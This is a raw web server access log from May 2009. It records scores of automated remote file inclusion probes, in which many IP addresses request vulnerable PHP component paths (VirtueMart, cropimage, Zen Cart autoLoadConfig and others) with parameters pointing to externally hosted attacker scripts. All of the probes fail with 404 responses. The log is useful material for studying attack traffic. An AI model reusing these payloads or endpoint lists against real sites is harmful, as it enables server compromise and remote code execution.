84.32.195.2 - - [14/May/2009:11:34:32 -0500] "GET /logs/access_log.1239235200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.90.72.88 - - [14/May/2009:11:34:47 -0500] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:11:34:47 -0500] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
117.110.196.220 - - [14/May/2009:11:35:19 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kit.kumoh.ac.kr/~rotc/bbs/icon/mawar.txt????? HTTP/1.1" 404 339 "-""Mozilla/5.0"
117.110.196.220 - - [14/May/2009:11:35:19 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kit.kumoh.ac.kr/~rotc/bbs/icon/mawar.txt????? HTTP/1.1" 404 334 "-""Mozilla/5.0"
117.110.196.220 - - [14/May/2009:11:35:19 -0500] "GET /logs/access_log.1239408000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kit.kumoh.ac.kr/~rotc/bbs/icon/mawar.txt????? HTTP/1.1" 404 361 "-""Mozilla/5.0"
117.110.196.220 - - [14/May/2009:11:35:25 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kit.kumoh.ac.kr/~rotc/bbs/icon/mawar.txt????? HTTP/1.1" 404 361 "-""Mozilla/5.0"
200.54.154.10 - - [14/May/2009:11:35:44 -0500] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:35:44 -0500] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
200.107.138.34 - - [14/May/2009:11:35:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 339 "-""libwww-perl/5.79"
200.107.138.34 - - [14/May/2009:11:35:53 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
85.214.86.93 - - [14/May/2009:11:36:13 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:11:36:13 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:11:36:13 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:11:36:14 -0500] "GET /logs/access_log.1240099200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
69.90.72.88 - - [14/May/2009:11:37:07 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:11:37:07 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
217.147.29.190 - - [14/May/2009:11:38:14 -0500] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
217.147.29.190 - - [14/May/2009:11:38:14 -0500] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
217.147.29.190 - - [14/May/2009:11:38:25 -0500] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.808"
217.147.29.190 - - [14/May/2009:11:38:25 -0500] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.808"
222.231.24.38 - - [14/May/2009:11:41:08 -0500] "GET /logs//components/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:11:41:08 -0500] "GET /logs//components/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:11:41:08 -0500] "GET /logs//components/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:11:41:08 -0500] "GET //components/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:11:41:08 -0500] "GET //components/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
222.231.24.38 - - [14/May/2009:11:41:09 -0500] "GET //components/errors.php?error=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
200.69.106.77 - - [14/May/2009:11:41:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rennellcorp.com/logs/v4id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
200.69.106.77 - - [14/May/2009:11:41:23 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.rennellcorp.com/logs/v4id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
62.44.79.35 - - [14/May/2009:11:42:17 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.44.79.35 - - [14/May/2009:11:42:17 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
69.90.72.88 - - [14/May/2009:11:42:27 -0500] "GET /logs//show.php?path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:11:42:28 -0500] "GET //show.php?path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:44:02 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:44:02 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:44:18 -0500] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:44:18 -0500] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:11:45:44 -0500] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:11:45:44 -0500] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
208.64.202.134 - - [14/May/2009:11:49:15 -0500] "GET /logs//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:15 -0500] "GET //administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:15 -0500] "GET /logs/access_log.1236211200//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:16 -0500] "GET /logs/access_log.1236643200//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:16 -0500] "GET //administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:16 -0500] "GET /logs//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:16 -0500] "GET /logs/access_log.1236211200//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
208.64.202.134 - - [14/May/2009:11:49:16 -0500] "GET /logs/access_log.1236643200//administrator/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:11:49:19 -0500] "GET //skin/zero_vote/ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:11:49:19 -0500] "GET /logs//skin/zero_vote/ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
221.157.225.65 - - [14/May/2009:11:49:19 -0500] "GET /logs/access_log.1235520000//skin/zero_vote/ask_password.php?%20dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:11:49:45 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:11:49:45 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.825"
70.86.169.162 - - [14/May/2009:11:49:56 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
70.86.169.162 - - [14/May/2009:11:49:56 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
85.214.86.93 - - [14/May/2009:11:52:37 -0500] "GET /errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:11:52:37 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:11:52:37 -0500] "GET /logs/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.208.142 - - [14/May/2009:11:52:48 -0500] "GET /logs/access_log.1120780800 HTTP/1.1" 200 4787 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [14/May/2009:11:52:49 -0500] "GET /logs/access_log.1188086400 HTTP/1.1" 200 8219 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.142 - - [14/May/2009:11:52:49 -0500] "GET /logs/access_log.1120089600 HTTP/1.1" 200 435 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.214.86.93 - - [14/May/2009:11:52:56 -0500] "GET /logs/access_log.1237161600/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
69.94.56.98 - - [14/May/2009:11:53:22 -0500] "GET /logs//index.php?autoLoadConfig%5B999%5D%5B0%5D%5BautoType%5D=include&autoLoadConfig%5B999%5D%5B0%5D%5BloadFile%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 286 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:11:53:22 -0500] "GET //index.php?autoLoadConfig%5B999%5D%5B0%5D%5BautoType%5D=include&autoLoadConfig%5B999%5D%5B0%5D%5BloadFile%5D=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 281 "-""libwww-perl/5.48"
69.90.72.88 - - [14/May/2009:11:55:42 -0500] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
69.90.72.88 - - [14/May/2009:11:55:42 -0500] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
201.86.123.181 - - [14/May/2009:11:57:05 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hitler.h17.ru//gallery/1.gif??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
201.86.123.181 - - [14/May/2009:11:57:05 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hitler.h17.ru//gallery/1.gif??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
201.86.123.181 - - [14/May/2009:11:57:05 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.hitler.h17.ru//gallery/1.gif??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:11:58:19 -0500] "GET /logs//send_reminders.php?noSet=0&includedir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:58:19 -0500] "GET //send_reminders.php?noSet=0&includedir=http://208.98.22.241/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:12:00:24 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.19 - - [14/May/2009:12:00:24 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.221.119.126 - - [14/May/2009:12:01:06 -0500] "GET /logs/errors.php?error=http://jianshenonline.com/mail/mail/FX29ID1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:12:01:06 -0500] "GET /errors.php?error=http://jianshenonline.com/mail/mail/FX29ID1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:12:01:06 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://jianshenonline.com/mail/mail/FX29ID1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.17.129.100 - - [14/May/2009:12:01:17 -0500] "GET /includes/class_item.php?fileExtension=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
84.17.129.100 - - [14/May/2009:12:01:17 -0500] "GET /logs/includes/class_item.php?fileExtension=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.17.129.100 - - [14/May/2009:12:01:17 -0500] "GET /logs/access_log.1233273600/includes/class_item.php?fileExtension=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.17.129.100 - - [14/May/2009:12:01:27 -0500] "GET /logs/access_log.1236124800/includes/class_item.php?fileExtension=http://www.datamatrixit.com/cp/copyright[1].txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
193.221.119.126 - - [14/May/2009:12:01:30 -0500] "GET /logs/access_log.1237161600/errors.php?error=http://jianshenonline.com/mail/mail/FX29ID1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [14/May/2009:12:03:07 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
62.44.79.35 - - [14/May/2009:12:03:07 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/idosiriys.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
212.150.52.114 - - [14/May/2009:12:03:53 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:03:53 -0500] "GET //Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:03:53 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:03:53 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:06:37 -0500] "GET //sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:06:37 -0500] "GET /logs//sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:06:37 -0500] "GET /logs/access_log.1238544000//sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:06:37 -0500] "GET /logs/access_log.1236124800//sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 385 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:06:42 -0500] "GET //include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:06:42 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:06:42 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:06:48 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.94.56.98 - - [14/May/2009:12:06:57 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 300 "-""libwww-perl/5.48"
69.94.56.98 - - [14/May/2009:12:06:57 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.0" 404 295 "-""libwww-perl/5.48"
211.43.202.66 - - [14/May/2009:12:06:59 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:06:59 -0500] "GET //include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:06:59 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.43.202.66 - - [14/May/2009:12:07:04 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.172.113.201 - - [14/May/2009:12:07:05 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.172.113.201 - - [14/May/2009:12:07:06 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
69.172.113.201 - - [14/May/2009:12:07:14 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
69.172.113.201 - - [14/May/2009:12:07:15 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
85.214.86.93 - - [14/May/2009:12:07:59 -0500] "GET //sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 358 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:07:59 -0500] "GET /logs/access_log.1238544000//sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 385 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:07:59 -0500] "GET /logs/access_log.1236124800//sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 385 "-""Mozilla/5.0"
85.214.86.93 - - [14/May/2009:12:07:59 -0500] "GET /logs//sohoadmin/includes/emulate_globals.php=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:09:38 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:09:38 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:09:38 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:12:09:38 -0500] "GET //Neos_Chronos/header.php?base_folder=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.178.197.14 - - [14/May/2009:12:09:49 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
62.178.197.14 - - [14/May/2009:12:10:09 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
84.201.208.50 - - [14/May/2009:12:10:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:12:10:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.201.208.50 - - [14/May/2009:12:10:22 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 361 "-""Mozi